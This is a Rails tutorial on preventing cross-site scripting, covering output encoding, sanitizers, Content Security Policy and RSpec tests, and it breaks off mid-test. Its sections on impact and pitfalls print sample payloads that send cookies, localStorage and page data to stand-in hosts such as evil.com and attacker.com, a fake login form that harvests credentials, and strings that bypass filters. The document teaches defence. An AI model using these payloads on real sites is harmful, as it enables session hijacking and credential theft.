CrackedRuby CrackedRuby

Cross-Site Scripting (XSS) Prevention

Overview

Cross-Site Scripting (XSS) represents a class of injection vulnerabilities where attackers inject malicious scripts into web pages viewed by other users. When successful, XSS attacks execute arbitrary JavaScript in the victim's browser within the security context of the vulnerable application, granting access to cookies, session tokens, and other sensitive information stored by the browser.

XSS vulnerabilities arise when applications include untrusted data in web pages without proper validation or escaping. The browser interprets this data as executable code rather than display content, leading to script execution. These vulnerabilities persist as one of the most prevalent security issues in web applications, consistently appearing in OWASP's Top 10 Web Application Security Risks.

The attack surface spans anywhere user input reaches a rendered page: form fields, URL parameters, database records, API responses, and even HTTP headers. Each injection point requires specific defensive measures tailored to the output context.

Three primary XSS variants exist:

Stored XSS persists malicious scripts in the application's data store (database, file system, cache). When other users retrieve and view this data, the application includes the malicious script in the response. This variant proves most dangerous as it affects multiple users without requiring them to click malicious links.

Reflected XSS occurs when an application immediately includes untrusted input in its response. Attackers craft malicious URLs containing script payloads, then trick users into clicking them. The server reflects the payload back in the response, causing the browser to execute it.

DOM-based XSS exists entirely client-side. Malicious scripts manipulate the Document Object Model through JavaScript, often by reading from unsafe sources like window.location or document.referrer and writing to dangerous sinks like innerHTML or eval.

# Vulnerable code - Stored XSS
class CommentsController < ApplicationController
  def create
    @comment = Comment.new(comment: params[:comment])
    @comment.save
  end
  
  def show
    @comment = Comment.find(params[:id])
    # Template contains: <%= @comment.comment.html_safe %>
    # Malicious comment: <script>fetch('https://evil.com?cookie='+document.cookie)</script>
  end
end

The impact extends beyond data theft. Attackers use XSS to perform actions as the victim user, deface websites, install keyloggers, redirect users to phishing sites, or exploit browser vulnerabilities. In applications with elevated privileges, XSS can facilitate complete account takeover or system compromise.

Key Principles

XSS prevention operates on defense-in-depth, applying multiple layers of protection rather than relying on a single technique. The primary principle mandates treating all user input as untrusted data requiring contextual encoding before insertion into web pages.

Context-Aware Output Encoding forms the foundation of XSS defense. Different contexts require different encoding schemes. HTML content requires HTML entity encoding, JavaScript strings need JavaScript encoding, URLs need percent encoding, and CSS requires CSS encoding. Applying the wrong encoding for a context fails to prevent XSS.

# Context-aware encoding examples
user_input = "<script>alert('XSS')</script>"

# HTML context - encode HTML entities
html_encoded = CGI.escapeHTML(user_input)
# => "&lt;script&gt;alert('XSS')&lt;/script&gt;"

# JavaScript string context - encode for JavaScript
js_encoded = user_input.gsub(/[<>'"\/]/) { |c| sprintf("\\u%04x", c.ord) }
# => "\u003cscript\u003ealert('XSS')\u003c/script\u003e"

# URL parameter context - percent encode
url_encoded = CGI.escape(user_input)
# => "%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

Secure by Default design ensures frameworks and templates automatically escape output unless developers explicitly mark content as safe. Ruby on Rails exemplifies this principle by HTML-escaping all template output by default. Developers must consciously use methods like html_safe or raw to bypass escaping, creating an explicit security decision point.

Input Validation provides an additional defense layer but never serves as the sole protection mechanism. Validation establishes allowlists of acceptable input patterns, rejecting anything that doesn't match. However, validation alone proves insufficient because requirements often demand accepting HTML or other potentially dangerous content.

# Input validation - defense in depth
class UserProfile
  validates :username, format: { 
    with: /\A[a-zA-Z0-9_-]+\z/,
    message: "only allows letters, numbers, underscores and hyphens"
  }
  
  validates :website_url, format: {
    with: /\Ahttps?:\/\//,
    message: "must start with http:// or https://"
  }
end

Content Security Policy (CSP) restricts the sources from which browsers load resources. Even if an XSS vulnerability exists, CSP prevents inline scripts from executing and blocks script loading from unauthorized domains. CSP operates as a last line of defense when output encoding fails or developers make mistakes.

Sanitization differs from encoding by removing or modifying dangerous content rather than encoding it for safe display. Sanitization applies when applications must accept rich HTML content like blog posts or comments with formatting. Sanitizers parse HTML and strip dangerous elements, attributes, and protocols while preserving safe markup.

The principle of least privilege applies to browser contexts. Applications should minimize the use of dangerous JavaScript APIs like eval, Function, and innerHTML. When these APIs prove necessary, applications must rigorously validate and sanitize all inputs.

Security headers provide additional protection layers. The X-XSS-Protection header (deprecated but still relevant for older browsers) activates browser-based XSS filters. The X-Content-Type-Options header prevents MIME-sniffing attacks that could reinterpret responses as executable content.

# Multiple defense layers
class ArticlesController < ApplicationController
  def create
    # Layer 1: Input validation
    return render_error unless valid_article_params?
    
    # Layer 2: Sanitization for rich content
    @article = Article.new(
      title: params[:title], # Will be HTML escaped in view
      content: sanitize_html(params[:content])
    )
    
    # Layer 3: CSP header (configured in application)
    # Layer 4: Automatic output encoding in templates
  end
  
  private
  
  def sanitize_html(html)
    ActionController::Base.helpers.sanitize(html, 
      tags: %w[p br strong em ul ol li],
      attributes: %w[href]
    )
  end
end

Security Implications

XSS vulnerabilities grant attackers the same privileges as the victimized user within the application. This equivalent access enables session hijacking, where attackers steal session cookies and impersonate the user without needing credentials. The attack executes silently, leaving users unaware their session has been compromised.

Session hijacking through XSS bypasses many authentication protections. Applications that properly hash passwords and implement multi-factor authentication remain vulnerable if session tokens can be stolen post-authentication. Attackers exfiltrate tokens using simple JavaScript.

# XSS payload that steals session cookie
# <script>
#   fetch('https://attacker.com/steal', {
#     method: 'POST',
#     body: JSON.stringify({
#       cookie: document.cookie,
#       location: window.location.href,
#       localStorage: JSON.stringify(localStorage)
#     })
#   });
# </script>

HttpOnly cookies mitigate but don't eliminate this threat. While HttpOnly cookies prevent JavaScript from reading document.cookie, attackers still perform actions as the authenticated user. XSS payloads can submit forms, make AJAX requests, and interact with the application using the user's existing session.

Credential theft extends beyond session tokens. XSS enables attackers to inject fake login forms that capture credentials when users enter them. The malicious form sends credentials to attacker-controlled servers while maintaining the appearance of legitimate application behavior.

# Stored XSS that creates a credential harvester
malicious_comment = <<-HTML
  <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
    <h1>Session Expired - Please Login Again</h1>
    <form action="https://attacker.com/harvest" method="POST">
      <input name="username" placeholder="Username" />
      <input name="password" type="password" placeholder="Password" />
      <button type="submit">Login</button>
    </form>
  </div>
HTML

Cross-Site Request Forgery (CSRF) bypass occurs when XSS vulnerabilities exist alongside CSRF protections. CSRF tokens protect against unauthorized form submissions, but XSS allows attackers to read these tokens from the page and include them in malicious requests. This negates CSRF protection entirely.

Privilege escalation happens when XSS affects administrative interfaces. An administrator viewing malicious content executes attacker scripts with administrative privileges, enabling unauthorized user creation, permission modification, or system configuration changes.

Information disclosure results from XSS reading sensitive page content. Attackers extract data from the DOM including personal information, business data, and system details that inform further attacks. Applications displaying sensitive data to authenticated users become particularly vulnerable.

# XSS payload extracting sensitive data
# <script>
#   const sensitiveData = {
#     accountNumber: document.querySelector('[data-account]').textContent,
#     balance: document.querySelector('[data-balance]').textContent,
#     transactions: Array.from(document.querySelectorAll('.transaction'))
#       .map(t => t.textContent)
#   };
#   fetch('https://attacker.com/exfil', {
#     method: 'POST',
#     body: JSON.stringify(sensitiveData)
#   });
# </script>

Malware distribution leverages XSS to redirect users to exploit kits and malicious downloads. Attackers inject scripts that detect browser versions and redirect to exploits targeting specific vulnerabilities. This transforms website compromise into broader malware campaigns.

The stored XSS variant creates persistent threats affecting every user who views the compromised content. A single stored XSS vulnerability in a popular page impacts thousands of users automatically, while reflected XSS requires social engineering to trick each victim individually.

Defacement attacks damage reputation and user trust. Attackers use XSS to modify page content, display unauthorized messages, or redirect users to competing or malicious sites. Even temporary defacement causes lasting reputational harm.

DOM-based XSS proves particularly insidious because payloads never reach the server. Traditional Web Application Firewalls (WAFs) and server-side security measures don't detect these attacks, as the vulnerability exists entirely in client-side JavaScript code.

Regulatory compliance considerations amplify XSS risk. Data breaches resulting from XSS exploitation trigger notification requirements under GDPR, CCPA, and similar regulations. Organizations face fines, legal liability, and mandatory disclosure obligations when attackers use XSS to access protected data.

The combination of XSS with other vulnerabilities amplifies impact. XSS facilitates reconnaissance for SQL injection by extracting database error messages. It bypasses Same-Origin Policy restrictions when combined with CORS misconfigurations. XSS transforms minor vulnerabilities into critical security failures.

Ruby Implementation

Ruby on Rails provides automatic XSS protection through its templating system. All ERB template output undergoes HTML escaping by default, converting dangerous characters into HTML entities that browsers display rather than execute.

# Automatic HTML escaping in ERB templates
# View template: app/views/posts/show.html.erb
<h1><%= @post.title %></h1>
<div class="content">
  <%= @post.body %>
</div>

# If @post.title contains: <script>alert('XSS')</script>
# Rails outputs: &lt;script&gt;alert('XSS')&lt;/script&gt;
# Browser displays: <script>alert('XSS')</script> (as text, not executed)

The html_safe method marks strings as safe for direct HTML output, bypassing automatic escaping. This method must be used judiciously and only on content that has been explicitly sanitized or generated by the application.

# Marking content as HTML safe
class Post < ApplicationRecord
  def formatted_content
    # DANGEROUS: Never use html_safe on user input directly
    # self.body.html_safe  # BAD
    
    # SAFE: Sanitize first, then mark as safe
    ActionController::Base.helpers.sanitize(self.body).html_safe
  end
end

# In view
<%= @post.formatted_content %>

Rails provides the sanitize helper for cleaning HTML while preserving safe markup. The helper accepts tag and attribute allowlists, removing everything not explicitly permitted.

# Configuring HTML sanitization
class CommentsController < ApplicationController
  def create
    @comment = Comment.new(
      body: sanitized_comment_body
    )
    @comment.save
  end
  
  private
  
  def sanitized_comment_body
    sanitize(params[:comment][:body], 
      tags: %w[p br strong em a ul ol li blockquote],
      attributes: {
        'a' => ['href', 'title'],
        'blockquote' => ['cite']
      },
      protocols: {
        'a' => { 'href' => ['http', 'https', 'mailto'] }
      }
    )
  end
end

The rails-html-sanitizer gem (Rails default) provides the underlying sanitization functionality. Applications can customize sanitizer configuration globally or per-controller.

# Custom sanitizer configuration
class ApplicationController < ActionController::Base
  def sanitize_rich_text(html)
    sanitizer = Rails::Html::SafeListSanitizer.new
    sanitizer.sanitize(html, 
      tags: safe_tags,
      attributes: safe_attributes
    )
  end
  
  def safe_tags
    %w[
      p br strong em u s a
      h1 h2 h3 h4 h5 h6
      ul ol li
      blockquote pre code
      table thead tbody tr th td
    ]
  end
  
  def safe_attributes
    {
      'a' => ['href', 'title', 'target'],
      'th' => ['scope'],
      'td' => ['colspan', 'rowspan']
    }
  end
end

JSON encoding requires special handling in JavaScript contexts. Rails provides escape_javascript (alias j) for safely embedding Ruby strings in JavaScript code.

# Escaping for JavaScript contexts
# View template with inline JavaScript
<script>
  var userName = '<%= j @user.name %>';
  var userBio = '<%= j @user.bio %>';
  
  // Even if @user.name contains quotes or </script> tags,
  // escape_javascript prevents breaking out of the string
</script>

# Implementation
module ActionView::Helpers::JavaScriptHelper
  JS_ESCAPE_MAP = {
    '\\'    => '\\\\',
    '</'    => '<\/',
    "\r\n"  => '\n',
    "\n"    => '\n',
    "\r"    => '\n',
    '"'     => '\\"',
    "'"     => "\\'"
  }
  
  def escape_javascript(javascript)
    javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r"'])/u) do
      JS_ESCAPE_MAP[$1]
    end
  end
end

Content Security Policy configuration in Rails restricts script execution sources. The secure_headers gem simplifies CSP implementation.

# Gemfile
gem 'secure_headers'

# config/initializers/secure_headers.rb
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self' 'unsafe-inline' 'unsafe-eval'],
    style_src: %w['self' 'unsafe-inline'],
    img_src: %w['self' data: https:],
    font_src: %w['self' data:],
    connect_src: %w['self'],
    frame_ancestors: %w['none']
  }
  
  config.x_frame_options = "DENY"
  config.x_content_type_options = "nosniff"
  config.x_xss_protection = "1; mode=block"
  config.referrer_policy = "strict-origin-when-cross-origin"
end

# Strict CSP configuration (recommended)
SecureHeaders::Configuration.override(:strict) do |config|
  config.csp = {
    default_src: %w['none'],
    script_src: %w['self'],
    style_src: %w['self'],
    img_src: %w['self' https:],
    font_src: %w['self'],
    connect_src: %w['self'],
    frame_ancestors: %w['none'],
    base_uri: %w['self'],
    form_action: %w['self']
  }
end

The Loofah gem provides additional sanitization capabilities with more granular control than the default sanitizer.

# Using Loofah for advanced sanitization
require 'loofah'

class ArticleProcessor
  def self.sanitize_article(html)
    document = Loofah.document(html)
    
    # Remove all JavaScript event handlers
    document.scrub!(:strip)
    
    # Remove dangerous tags
    document.xpath('.//script | .//iframe | .//object | .//embed').remove
    
    # Sanitize href attributes
    document.css('a').each do |link|
      href = link['href']
      unless href&.start_with?('http://', 'https://', '/')
        link.remove_attribute('href')
      end
    end
    
    document.to_html
  end
end

HttpOnly and Secure cookie flags prevent JavaScript access to session cookies and ensure transmission only over HTTPS.

# config/initializers/session_store.rb
Rails.application.config.session_store :cookie_store,
  key: '_myapp_session',
  httponly: true,
  secure: Rails.env.production?,
  same_site: :lax

# Setting cookies with security flags
class SessionsController < ApplicationController
  def create
    cookies.encrypted[:user_id] = {
      value: user.id,
      httponly: true,
      secure: Rails.env.production?,
      same_site: :strict
    }
  end
end

Parameter filtering prevents sensitive data from appearing in logs where XSS might expose it.

# config/initializers/filter_parameter_logging.rb
Rails.application.config.filter_parameters += [
  :password, :password_confirmation,
  :ssn, :credit_card, :cvv,
  :api_key, :secret_key, :token
]

Practical Examples

User profile pages commonly suffer from XSS when displaying biographical information or social media links. Attackers inject malicious scripts into profile fields, compromising every user who views the profile.

# Vulnerable implementation
class ProfilesController < ApplicationController
  def show
    @user = User.find(params[:id])
  end
end

# app/views/profiles/show.html.erb (VULNERABLE)
<div class="profile">
  <h1><%= @user.name %></h1>
  <div class="bio"><%= @user.bio.html_safe %></div>
  <a href="<%= @user.website %>">Website</a>
</div>

# Attack vectors:
# @user.bio = "<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>"
# @user.website = "javascript:alert(document.cookie)"

Secure implementation applies appropriate encoding and validation:

# Secure implementation
class Profile < ApplicationRecord
  validates :website, format: { 
    with: /\Ahttps?:\/\//,
    message: "must be a valid HTTP or HTTPS URL"
  }
  
  def sanitized_bio
    ActionController::Base.helpers.sanitize(bio,
      tags: %w[p br strong em],
      attributes: []
    )
  end
end

# app/views/profiles/show.html.erb (SECURE)
<div class="profile">
  <h1><%= @user.name %></h1>
  <div class="bio"><%= @user.sanitized_bio.html_safe %></div>
  <% if @user.website.present? %>
    <a href="<%= @user.website %>" rel="noopener noreferrer" target="_blank">Website</a>
  <% end %>
</div>

Search functionality presents reflected XSS vulnerabilities when displaying search queries back to users. Attackers craft malicious URLs that execute scripts when victims click them.

# Vulnerable search implementation
class SearchController < ApplicationController
  def results
    @query = params[:q]
    @results = Article.where("title LIKE ?", "%#{@query}%")
  end
end

# app/views/search/results.html.erb (VULNERABLE)
<h2>Results for: <%= @query.html_safe %></h2>

# Malicious URL:
# /search?q=<script>fetch('http://evil.com?c='+document.cookie)</script>

Secure search displays the query safely:

# Secure search implementation
class SearchController < ApplicationController
  def results
    @query = params[:q]&.strip
    
    # Validate query length and content
    if @query.blank? || @query.length > 100
      redirect_to root_path, alert: "Invalid search query"
      return
    end
    
    # Parameterized query prevents SQL injection
    @results = Article.where("title LIKE ?", "%#{sanitize_sql_like(@query)}%")
  end
  
  private
  
  def sanitize_sql_like(string)
    string.gsub(/[\\%_]/) { |x| "\\#{x}" }
  end
end

# app/views/search/results.html.erb (SECURE)
<h2>Results for: <%= @query %></h2>
<%# Rails automatically HTML-escapes @query %>

Comment systems require particularly careful XSS prevention as they allow user-generated content visible to all users. Stored XSS in comments affects every reader.

# Comprehensive comment security
class Comment < ApplicationRecord
  belongs_to :article
  belongs_to :user
  
  validates :body, presence: true, length: { maximum: 5000 }
  
  before_save :sanitize_body
  
  def sanitized_content
    # Already sanitized in before_save, mark as safe for rendering
    body.html_safe
  end
  
  private
  
  def sanitize_body
    self.body = ActionController::Base.helpers.sanitize(body,
      tags: %w[p br strong em a blockquote],
      attributes: { 'a' => ['href', 'title'] },
      protocols: { 'a' => { 'href' => ['http', 'https'] } }
    )
  end
end

class CommentsController < ApplicationController
  before_action :authenticate_user!
  before_action :rate_limit_comments
  
  def create
    @article = Article.find(params[:article_id])
    @comment = @article.comments.build(comment_params)
    @comment.user = current_user
    
    if @comment.save
      redirect_to @article, notice: "Comment posted"
    else
      render 'articles/show', status: :unprocessable_entity
    end
  end
  
  private
  
  def comment_params
    params.require(:comment).permit(:body)
  end
  
  def rate_limit_comments
    # Prevent XSS payload spamming
    recent_comments = current_user.comments
      .where("created_at > ?", 5.minutes.ago)
      .count
      
    if recent_comments >= 5
      redirect_to root_path, alert: "Too many comments, please wait"
    end
  end
end

Admin panels handle sensitive operations and privileged data, making them prime XSS targets. Privilege escalation through admin XSS enables complete system compromise.

# Secure admin panel with CSP
class Admin::BaseController < ApplicationController
  before_action :require_admin
  before_action :set_strict_csp
  
  private
  
  def require_admin
    unless current_user&.admin?
      redirect_to root_path, alert: "Access denied"
    end
  end
  
  def set_strict_csp
    # Override with strict CSP for admin area
    use_secure_headers_override(:admin_strict)
  end
end

# config/initializers/secure_headers.rb
SecureHeaders::Configuration.override(:admin_strict) do |config|
  config.csp = {
    default_src: %w['none'],
    script_src: %w['self'],
    style_src: %w['self'],
    img_src: %w['self'],
    font_src: %w['self'],
    connect_src: %w['self'],
    frame_ancestors: %w['none'],
    base_uri: %w['self'],
    form_action: %w['self']
  }
end

# Admin user management
class Admin::UsersController < Admin::BaseController
  def update
    @user = User.find(params[:id])
    
    # Never trust user input, even in admin panels
    if @user.update(sanitized_user_params)
      redirect_to admin_user_path(@user), notice: "User updated"
    else
      render :edit
    end
  end
  
  private
  
  def sanitized_user_params
    permitted = params.require(:user).permit(:name, :email, :role)
    
    # Additional validation for admin operations
    if permitted[:name].present?
      permitted[:name] = ActionController::Base.helpers.sanitize(
        permitted[:name],
        tags: []
      )
    end
    
    permitted
  end
end

Common Patterns

The Template Escaping Pattern relies on framework defaults to handle XSS prevention automatically. This pattern proves most effective when developers understand that disabling auto-escaping requires explicit justification.

# Template escaping pattern
# Correct: Let Rails handle escaping
<div class="user-content">
  <%= @content %>
</div>

# Incorrect: Unnecessary manual escaping
<div class="user-content">
  <%= CGI.escapeHTML(@content) %>
</div>

# Correct: Sanitize rich content before marking safe
<div class="user-content">
  <%= sanitize(@content, tags: %w[p br strong em]).html_safe %>
</div>

The Allowlist Pattern explicitly defines permitted HTML elements and attributes, rejecting everything else. This proves more secure than denylists which attempt to block known dangerous patterns but miss new attack vectors.

# Allowlist pattern for rich text
module RichTextSanitizer
  ALLOWED_TAGS = %w[
    p br div span
    strong em u s
    h1 h2 h3 h4 h5 h6
    ul ol li
    a blockquote pre code
    table thead tbody tr th td
  ].freeze
  
  ALLOWED_ATTRIBUTES = {
    'a' => ['href', 'title'],
    'th' => ['scope'],
    'td' => ['colspan', 'rowspan'],
    'div' => ['class'],
    'span' => ['class']
  }.freeze
  
  ALLOWED_PROTOCOLS = {
    'a' => { 'href' => ['http', 'https', 'mailto'] }
  }.freeze
  
  def self.sanitize(html)
    ActionController::Base.helpers.sanitize(html,
      tags: ALLOWED_TAGS,
      attributes: ALLOWED_ATTRIBUTES,
      protocols: ALLOWED_PROTOCOLS
    )
  end
end

# Usage
class Article < ApplicationRecord
  before_save :sanitize_content
  
  def sanitize_content
    self.body = RichTextSanitizer.sanitize(body)
  end
end

The Content Security Policy Pattern implements defense-in-depth by restricting resource loading even when XSS vulnerabilities exist. CSP headers tell browsers which sources to trust for scripts, styles, and other resources.

# CSP pattern with nonce-based scripts
class ApplicationController < ActionController::Base
  before_action :set_csp_nonce
  
  private
  
  def set_csp_nonce
    @csp_nonce = SecureRandom.base64(16)
    
    response.headers['Content-Security-Policy'] = [
      "default-src 'self'",
      "script-src 'self' 'nonce-#{@csp_nonce}'",
      "style-src 'self' 'unsafe-inline'",
      "img-src 'self' https: data:",
      "font-src 'self'",
      "connect-src 'self'",
      "frame-ancestors 'none'",
      "base-uri 'self'",
      "form-action 'self'"
    ].join('; ')
  end
end

# In views, use the nonce for inline scripts
<script nonce="<%= @csp_nonce %>">
  console.log('This script is allowed');
</script>

The Contextual Encoding Pattern applies different encoding schemes based on where data appears in the output. HTML context uses HTML encoding, JavaScript context uses JavaScript encoding, URL context uses percent encoding.

# Contextual encoding pattern
class OutputEncoder
  def self.for_html(text)
    CGI.escapeHTML(text.to_s)
  end
  
  def self.for_javascript(text)
    # Escape characters that could break out of JS strings
    text.to_s.gsub(/[\u0000-\u001f"'\\\/<>]/) do |char|
      case char
      when "\n" then '\n'
      when "\r" then '\r'
      when "\t" then '\t'
      when '"'  then '\"'
      when "'"  then "\\\'"
      when '\\' then '\\\\'
      when '/'  then '\\/'
      when '<'  then '\u003c'
      when '>'  then '\u003e'
      else
        sprintf("\\u%04x", char.ord)
      end
    end
  end
  
  def self.for_url(text)
    CGI.escape(text.to_s)
  end
  
  def self.for_css(text)
    # Escape characters that could break out of CSS
    text.to_s.gsub(/[^a-zA-Z0-9\-_]/) do |char|
      sprintf("\\%x", char.ord)
    end
  end
end

# Usage in views
<div data-username="<%= OutputEncoder.for_html(@user.name) %>">
<script>
  var name = "<%= OutputEncoder.for_javascript(@user.name) %>";
  var profileUrl = "/users/<%= OutputEncoder.for_url(@user.name) %>";
</script>
<style>
  .user-<%= OutputEncoder.for_css(@user.name) %> {
    color: blue;
  }
</style>

The Sanitization Wrapper Pattern encapsulates HTML sanitization logic in dedicated service objects, ensuring consistent application of security rules.

# Sanitization wrapper pattern
class ContentSanitizer
  attr_reader :content, :context
  
  def initialize(content, context = :default)
    @content = content
    @context = context
  end
  
  def sanitize
    case context
    when :comment
      sanitize_comment
    when :article
      sanitize_article
    when :profile
      sanitize_profile
    else
      sanitize_basic
    end
  end
  
  private
  
  def sanitize_comment
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em a],
      attributes: { 'a' => ['href'] },
      protocols: { 'a' => { 'href' => ['http', 'https'] } }
    )
  end
  
  def sanitize_article
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em u s h2 h3 a ul ol li blockquote pre code],
      attributes: { 'a' => ['href', 'title'] },
      protocols: { 'a' => { 'href' => ['http', 'https'] } }
    )
  end
  
  def sanitize_profile
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em],
      attributes: []
    )
  end
  
  def sanitize_basic
    ActionController::Base.helpers.sanitize(content, tags: [])
  end
end

# Usage
class Comment < ApplicationRecord
  before_save :sanitize_body
  
  def sanitize_body
    self.body = ContentSanitizer.new(body, :comment).sanitize
  end
end

Common Pitfalls

Developers frequently misunderstand the html_safe method, treating it as a sanitizer when it merely marks strings as safe for rendering without escaping. Calling html_safe on untrusted input creates immediate XSS vulnerabilities.

# DANGEROUS: html_safe without sanitization
class Post < ApplicationRecord
  def formatted_body
    body.html_safe  # XSS vulnerability
  end
end

# SAFE: Sanitize before marking safe
class Post < ApplicationRecord
  def formatted_body
    ActionController::Base.helpers.sanitize(body).html_safe
  end
end

String concatenation with html_safe strings loses the safe marking, leading to double escaping or incorrect handling. Rails tracks safe strings through the ActiveSupport::SafeBuffer class, but concatenation can break this tracking.

# Concatenation pitfalls
safe_string = "<strong>Bold</strong>".html_safe
user_input = params[:name]

# Wrong: User input contaminates safe string
result = safe_string + user_input  # User input not escaped

# Correct: Explicitly escape user input
result = safe_string + ERB::Util.html_escape(user_input)

# Better: Use Rails helpers
result = safe_tag(:p) do
  safe_string + tag.span(user_input)
end

JSON rendering in JavaScript contexts requires proper escaping, but developers often emit JSON directly into script tags without encoding. This creates XSS when JSON contains user-controlled strings with script-breaking characters.

# VULNERABLE: Raw JSON in script tag
<script>
  var userData = <%= @user.to_json %>;
  // If @user.name contains </script>, it breaks out
</script>

# SAFE: Use json_escape helper
<script>
  var userData = <%= j @user.to_json %>;
</script>

# BETTER: Use data attributes
<div id="user-data" data-user="<%= @user.to_json %>"></div>
<script>
  var userData = JSON.parse(
    document.getElementById('user-data').dataset.user
  );
</script>

Sanitizer bypass occurs when developers create custom sanitization logic without considering all attack vectors. Attackers use character encoding tricks, nested tags, and protocol handlers to circumvent naive filtering.

# VULNERABLE: Incomplete custom sanitization
def sanitize_custom(html)
  html.gsub(/<script.*?>.*?<\/script>/im, '')  # Misses many variants
end

# Attack vectors that bypass:
# <scr<script>ipt>alert(1)</scr</script>ipt>
# <img src=x onerror=alert(1)>
# <a href="javascript:alert(1)">Click</a>

# SAFE: Use battle-tested sanitizer
def sanitize_custom(html)
  ActionController::Base.helpers.sanitize(html,
    tags: permitted_tags,
    attributes: permitted_attributes
  )
end

Forgetting context-specific encoding creates vulnerabilities when embedding data in different contexts. HTML encoding doesn't protect JavaScript contexts, and JavaScript encoding doesn't protect HTML contexts.

# VULNERABLE: Wrong encoding for context
<a href="/search?q=<%= CGI.escapeHTML(params[:query]) %>">
  Search
</a>
# Should use URL encoding: CGI.escape(params[:query])

<script>
  var searchQuery = "<%= CGI.escapeHTML(params[:query]) %>";
</script>
# Should use JavaScript encoding: j params[:query]

# CORRECT: Context-appropriate encoding
<a href="/search?q=<%= CGI.escape(params[:query]) %>">Search</a>

<script>
  var searchQuery = "<%= j params[:query] %>";
</script>

DOM-based XSS in JavaScript code goes undetected by server-side protections. Developers write vulnerable client-side code that reads from unsafe sources and writes to dangerous sinks.

// VULNERABLE: DOM-based XSS
// Unsafe source: window.location.hash
var userContent = window.location.hash.substring(1);
document.getElementById('content').innerHTML = userContent;

// Attack URL: http://example.com/#<img src=x onerror=alert(1)>

// SAFE: Sanitize or use textContent
var userContent = window.location.hash.substring(1);
document.getElementById('content').textContent = userContent;

// Or sanitize before rendering
var sanitized = DOMPurify.sanitize(userContent);
document.getElementById('content').innerHTML = sanitized;

Overriding CSP with unsafe directives negates its protection. Developers add unsafe-inline and unsafe-eval to CSP policies to fix broken functionality rather than addressing the underlying security issues.

# WEAK CSP: Too permissive
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self' 'unsafe-inline' 'unsafe-eval'],  # Defeats XSS protection
    style_src: %w['self' 'unsafe-inline']
  }
end

# STRONG CSP: Use nonces or hashes
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self'],  # No unsafe directives
    style_src: %w['self'],
    upgrade_insecure_requests: true
  }
end

Trusting client-side validation creates a false sense of security. Attackers bypass client-side checks by modifying requests or disabling JavaScript, requiring server-side validation regardless of client-side protections.

# VULNERABLE: Only client-side validation
# app/views/posts/new.html.erb
<%= form_with model: @post do |f| %>
  <%= f.text_field :title, pattern: "[A-Za-z0-9 ]+" %>
  <%= f.submit %>
<% end %>

# SAFE: Server-side validation
class Post < ApplicationRecord
  validates :title, format: { 
    with: /\A[A-Za-z0-9 ]+\z/,
    message: "only allows letters, numbers, and spaces"
  }
  
  before_save :sanitize_content
  
  def sanitize_content
    self.body = ActionController::Base.helpers.sanitize(body)
  end
end

Testing Approaches

XSS testing requires both automated tools and manual testing to achieve comprehensive coverage. Automated scanners detect common patterns but miss context-specific vulnerabilities and complex attack chains.

Security test suites should include XSS-specific test cases covering reflected, stored, and DOM-based variants. These tests verify that malicious input receives proper encoding or sanitization before output.

# RSpec tests for XSS prevention
require 'rails_helper'

RSpec.describe Post, type: :model do
  describe "XSS prevention" do
    let(:xss_payload) { "<script>alert('XSS')</script>" }
    let(:post) { Post.create(title: "Test", body: xss_payload) }
    
    it "sanitizes script tags from body" do
      expect(post.body).not_to include("<script>")
      expect(post.body).not_to include("alert")
    end
    
    it "preserves safe HTML tags" do
      safe_content = "<p>Paragraph</p><strong>Bold</strong>"
      post = Post.create(body: safe_content)
      
      expect(post.body).to include("<p>")
      expect(post.body).to include("<strong>")
    end
    
    it "removes dangerous attributes" do
      post = Post.create(body: '<a href="javascript:alert(1)">Link</a>')
      expect(post.body).not_to include("javascript:")
    end
    
    it "handles nested XSS attempts" do
      nested = '<div><script>alert(1)</script></div>'
      post = Post.create(body: nested)
      
      expect(post.body).not_to include("<script>")
    end
  end
end

RSpec.describe CommentsController, type: :controller do
  describe "POST #create" do
    let(:article) { create(:article) }
    let(:user) { create(:user) }
    
    before { sign_in user }
    
    it "sanitizes comment body" do
      xss_payload = "<script>document.location='http://evil.com'</script>"
      
      post :create, params: {
        article_id: article.id,
        comment: { body: xss_payload }
      }
      
      comment = Comment.last
      expect(comment.body).not_to include("<script>")
    end
    
    it "preserves allowed HTML" do
      safe_html = "<p>Comment with <strong>bold</strong> text</p>"
      
      post :create, params: {
        article_id: article.id,
        comment: { body: safe_html }
      }
      
      comment = Comment.last
      expect(comment.body).to include("<strong>")
    end
  end
end

Integration tests verify that XSS protections work throughout the request-response cycle, from user input through database storage to rendered output.

# Integration tests for XSS
require 'rails_helper'

RSpec.describe "XSS Protection", type: :request do
  describe "search functionality" do
    it "escapes search queries in results" do
      xss_query = "<script>alert('XSS')</script>"
      
      get search_path, params: { q: xss_query }
      
      expect(response.body).not_to include("<script>alert")
      expect(response.body).to include(CGI.escapeHTML(xss_query))
    end
    
    it "does not execute JavaScript in search queries" do
      javascript_url = "javascript:alert(document.cookie)"
      
      get search_path, params: { q: javascript_url }
      
      expect(response.body).not_to include("javascript:")
    end
  end
  
  describe "user profiles" do
    let(:user) { create(:user) }
    
    it "sanitizes bio HTML" do
      user.update(bio: "<script>alert(1)</script><p>Bio</p>")
      
      get user_path(user)
      
      expect(response.body).not_to include("<script>")
      expect(response.body).to include("<p>Bio</p>")
    end
    
    it "validates website URLs" do
      user.update(website: "javascript:alert(1)")
      
      get user_path(user)
      
      expect(response.body).not_to include('href="javascript:')
    end
  end
end

Feature tests with Capybara verify XSS protection from an end-user perspective, ensuring malicious content doesn't execute in the browser.

# Feature tests with Capybara
require 'rails_helper'

RSpec.feature "XSS Prevention in Comments", type: :feature do
  let(:user) { create(:user) }
  let(:article) { create(:article) }
  
  before do
    login_as(user)
  end
  
  scenario "script tags are sanitized from comments" do
    visit article_path(article)
    
    fill_in "Comment", with: "<script>alert('XSS')</script>Comment text"
    click_button "Post Comment"
    
    expect(page).not_to have_selector("script")
    expect(page).to have_content("Comment text")
  end
  
